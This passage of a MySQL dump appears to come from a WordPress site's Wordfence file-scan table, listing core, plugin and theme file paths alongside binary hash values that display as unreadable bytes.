ib��ǎ�ҫ�&�dV5�ojd\"���2�@��','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lr\r,�Av`�� ���T','6�.�_��*��NMo�\r��k��n�Z�\r/��+','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h	U?�S�s�H�ב�Y��ٳ','',0,'?'),('%)c���j�6�6�BK�','wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php',0,'�$�K͞�u	Q�� �p�','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cJ>|Eqv0|bv�� ','ܟ�j�pe�M�N�?���a��Xi+!S�2','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%[���;a�-�ٯ','wp-includes/wp-includes/class-wp-theme.php',0,'���ɱ��h�k2\\���','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('%k^�}���s�*�n�','wp-includes/wp-includes/js/api-request.min.js',0,'��k#�(�ĩ����','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('%{[������؅w�','wp-content/themes/shootingstar/docs/assets/blueprint-css/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�i��ϫ>1#.��v','��`��=�^�e���^�AH`���\n�S�','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���W���Ni\r��ag','��Z�I��%�W��~�h\0x�ir�!��cJ�b','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߜ8���]��a','Z��<P���^�k$�>aK�a��G��s*','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(;Hd����(�_�e�R','Sݱ`�� 6�Xi�\0�v�4K��E�qzi','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('%��s��M���*����','wp-content/themes/shootingstar/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\Zm�G��$�9���0','<q�<,�,���xB��?��nF�ܰ�ڶ?R�V','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&\Z��b8���f�M=u','wp-includes/wp-includes/spl-autoload-compat.php',0,'6��u�{�t���','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&6���.&�fG�	ٻ�','wp-includes/wp-includes/Requests/Session.php',0,'7��݆��Ζ���}l�','7��݆��Ζ���}l�','e`݆�.�΃:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('&W+��s�~;��*�','wp-includes/wp-includes/js/jquery/jquery.form.js',0,'Њn=i���f���5]','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���$w☈_�h','���`�!�\Z8}���-nɄ>5,4�\'ew�3k�3','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E_-�\r3�','X΢˔&��(�N�\\F�0%��o�0��>�','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&�;%�8I�R/+��\n`.','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png',0,'7~!���\0����\"w','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&ľ�=�@zy�v�T~','wp-includes/wp-includes/js/dist/deprecated.min.js',0,'T�\\O���d�#��s�u','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&��!v���\'&�Ji','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php',0,'��ԡ�P�\n}�$','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nqd��Ը��}��','��\Z�����h��=RG��0��%̪���	�Mm6','',0,'?'),('\'�ە}+V\r`R��`j','wp-includes/wp-includes/blocks/latest-posts.php',0,'�i{�$F�ČPի!','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'>��C͍z9!F\Z��','wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js',0,'�&��H������*��l�','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'A�ʝ��dB��8�','wp-content/themes/shootingstar/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k)*�p*T�x�Q','gO��y�q*X3Ցd�\\\r{aѩ]���0���','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N׌�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'g���w�Q����','wp-includes/wp-includes/js/media-grid.js',0,'BN5�d��b�i^&ޖn','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'y�m���]����','wp-includes/wp-includes/feed-rss.php',0,'iJ�?YC�>^��f�','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('\'��&�%45�Z=�L0�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/external.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F`7X#�g��8�Iй','oLa��H��\\�]\'��{��_�Ӕt�Pw�˹','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'��9 \Zid��E�<��~','wp-includes/wp-includes/default-widgets.php',0,'0�t��<�޸��!�','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'������y0V�Z\\','wp-includes/wp-includes/Requests/Cookie/Jar.php',0,'�0_��&p��\"4�\\�','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&�	','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'ڨ�oκdm=�ù�9','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',0,'L�{��p�׶�Ҡ','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p	-���D����<z�w榀UD4�Ԥ','',0,'?'),('\'�0�o�Lx�����','wp-includes/wp-includes/js/dist/block-directory.min.js',0,'�*U���ܰ��(���','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('\'�E��w�D9�>��8','wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php',0,'(��|v�}�9S�9S','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('\'��̬L�Nќ��I�R','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',0,'�!�<�]��r�','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(M()8.閧Zֈj��','wp-includes/wp-includes/Requests/Proxy.php',0,'�@k7�\0��t�\\*��G','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��5�yP��Õ�{','��NI7`&\'�8�Zt���U�-��*��n�/Y','',0,'?'),('(h\"\n�-B���	Wd6','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js',0,',m;V*H��Tt���~X�',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('(s�D��+��|���<u','wp-includes/wp-includes/SimplePie/Parse/Date.php',0,'N\\�O2�����C[\nջ','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z	j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'	�}�	����i�w&','0$����p\Z�c��5�mJ����^�y\"C','',0,'?'),('(�\\�C�*o)���','wp-includes/wp-includes/js/dist/blocks.js',0,' */ĭ�b��@m�0',' */ĭ�b��@m�0','����˴kS򢱼h�4���!�3:�Tæ�~DM','',0,'?'),('(����\"����E=�','wp-includes/wp-includes/js/jquery/ui/button.min.js',0,'�k{�qz�uo�>���','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�+Gq#�]��`6�!	',')A�Ta9��9e\Z�?#�?�b�����n��]���','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(��� R�w���?}','wp-includes/wp-includes/class-wp-role.php',0,'��yH���,o�:���','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(����M�(�72���','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js',0,'<�C�_hz�3��<7','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('(�p���	�����','wp-includes/wp-includes/css/dist/nux/style-rtl.min.css',0,'\n����n��L�6\r�k','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(�d���9n�+̦�','wp-includes/wp-includes/theme-compat/footer-embed.php',0,'��Z����.�+�j','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�,���ג8�ʺv�','wp-includes/wp-includes/Text/Diff/Renderer/inline.php',0,'�\n�n5�P�����B\'�','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('(�=��,��*F\n�^Jv','wp-content/plugins/wp-cerber/assets/flags/eh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���n���7W6^\Z','��I�auK�+��<?�`]�n]�m|�P�ّS','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')SB&�Fy�/N���]8\Z','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php',0,'!�i��L�V=X+�	v0~','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),(')\\�ԋ�P*gO߻��','wp-content/themes/shootingstar/docs/documentation.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9f:\r�Z^6S�ޏ��','���A����|�\0����>��(�A)Ń�-','',0,'?'),(')b���*nA��~�','wp-includes/wp-includes/js/plupload/wp-plupload.min.js',0,'����Z�:�x��r�','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),(')e7��麊V�J�tI','wp-content/themes/shootingstar/css/colors/orange.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2%���:18}�','j���|�-�|����s�r��1hq��$M��E','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),(')�*��S�k�QK2,','wp-includes/wp-includes/js/wp-sanitize.min.js',0,'i�f05��}$��]���','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),(')��H7�N�Jbv�/�','wp-includes/wp-includes/images/media/text.png',0,'z��s��0�ȝ�Q�K','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0B6\"��–�7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),(')Ő�1�H$�`��','wp-includes/wp-includes/images/toggle-arrow.png',0,'��·�a��;�d��*�','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!�[)T.�nk=ݗ��','�tl���J%�0wdE��\"�4.t�kL��9�1��','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xO����$:��g-','M����J,�l��zEX�N>�����T��','',0,'?'),(')�x���O�5��-','wp-includes/wp-includes/js/colorpicker.min.js',0,'��3+ h\"��C��k','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������u1��;	!ɥ�','|���\Z^}=ρ�>�m̎7i���A���@�C&','',0,'?'),('*O�z��!�.��aav�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',0,'eo1Ǡ܇4RA����','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز��$l�6S��u��q','��Ӏ(r%�Ǟb�i�j�u@��>��Hr\ZF�]��','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y�QP�\nz����G�','�g��NQ	�������/���	�y5������θc','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�E�Ǭ�qQM���','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js',0,'�o�go����~i�I	�','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*�	�ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`GN��M��ti����','�r��_4\0��2��:䮰�!p1A��c_','',0,'?'),('*�B=�s��C�F�zh�r','wp-includes/wp-includes/js/mce-view.min.js',0,'����<��@^�P�\'','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('+�0Lm1���t?�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/im.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��87N ��]���','�W���t�`c�ʕoAR㞶�C��J=��d','',0,'?'),('+PXoV�h�S�)\r�','wp-includes/wp-includes/css/wp-auth-check.css',0,'�%��L��ԥ|l\"��','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Y��=��{��','�z޺#s�Tc o%*��l1�qܩ�d�I�G��','',0,'?'),('+N�m\n�=��-\0`�y','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js',0,'SE���x=d��~���eM','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0	','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+xVk��eg��4%��','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php',0,'��D�5��$ý\n	�\'q0','��D�5��$ý\n	�\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('+�����f`��|�.�','wp-includes/wp-includes/js/dist/url.js',0,'�7����nb�A�x��','�7����nb�A�x��','+׺\r��O��2UP^kD\0(���c��J�<','',0,'?'),('+�g\0�k\Z�O�C��Z','wp-includes/wp-includes/images/smilies/frownie.png',0,'Q���������','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Z�����x���d','�&9�+��\\\0���	҄&1ܪCj��ڠ�Z','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�K����Ʈ�;','2�<������A$2�V���e>G�3�7�\Z�','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�/��gc��]��ϓ�','wp-includes/wp-includes/ID3/license.commercial.txt',0,'\n;g��J�g����xA�','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('+��0Ϩ�*����a','wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php',0,'2Ua�w�<�Iw�p�O7-','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('+��s�s�zҖx!��P�','wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js',0,'�%i�3����f����','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('+�eE�6y��d~�	�','wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js',0,'�;I^�\Z+:C��)H[','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),(',��Je����;�','wp-content/plugins/wp-cerber/assets/flags/sv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Z�k�}Ϸ	